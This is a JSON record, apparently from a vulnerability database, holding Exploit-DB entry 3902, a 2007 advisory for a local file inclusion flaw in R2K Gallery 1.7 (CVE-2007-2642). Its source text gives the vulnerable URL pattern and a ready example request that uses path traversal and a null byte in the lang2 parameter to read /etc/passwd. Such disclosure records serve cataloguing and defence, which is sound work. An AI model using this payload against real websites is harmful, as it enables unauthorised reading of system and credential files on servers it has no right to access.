{"id": "EDB-ID:3902", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion", "description": "", "published": "2007-05-11T00:00:00", "modified": "2007-05-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/3902", "reporter": "Dj7xpl", "references": [], "cvelist": ["2007-2642"], "immutableFields": [], "lastseen": "2022-01-13T07:09:13", "viewCount": 14, "enchantments": {"dependencies": {}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2007-2642"]}]}, "exploitation": null, "vulnersScore": 5.9}, "sourceHref": "https://www.exploit-db.com/download/3902", "sourceData": " \\\\\\|///\r\n \\\\ - - //\r\n ( @ @ )\r\n----oOOo--(_)-oOOo---------------------------------------------------\r\n\r\n[ Y! Underground Group ]\r\n[ Dj7xpl@yahoo.com ]\r\n[ Dj7xpl.2600.ir ]\r\n\r\n----ooooO-----Ooooo--------------------------------------------------\r\n ( ) ( )\r\n \\ ( ) /\r\n \\_) (_/\r\n\r\n---------------------------------------------------------------------\r\n\r\n[!] Portal : R2K Gallery v1.7\r\n[!] Download : http://usuarios.lycos.es/r2kscripts/\r\n[!] Type : Local File Include Vuln\r\n\r\n---------------------------------------------------------------------\r\n\r\n---------------------------------------------------------------------\r\n\r\nBug :\r\n\r\nhttp://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]\r\n\r\nExample :\r\n\r\nhttp://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00\r\n\r\n---------------------------------------------------------------------\r\n\r\n# milw0rm.com [2007-05-11]", "osvdbidlist": ["36015"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1647201910}}

{}